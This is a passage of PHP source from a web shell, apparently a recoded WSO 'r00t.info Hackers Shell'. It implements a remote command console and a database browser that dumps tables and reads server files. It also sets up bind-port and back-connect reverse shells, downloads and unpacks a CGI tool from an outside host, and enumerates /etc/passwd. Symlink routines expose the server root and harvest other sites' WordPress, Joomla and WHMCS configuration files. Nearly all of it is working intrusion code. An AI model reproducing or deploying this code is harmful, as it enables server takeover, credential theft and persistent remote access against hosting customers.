"document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&\r\nwidth=260&\r\ncolorsche\r\nme=light&\r\nshow_faces=true&\r\nborder_color=\r\n%23fff&\r\nstream=false&\r\nheader=false&\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> \r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \' \r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } 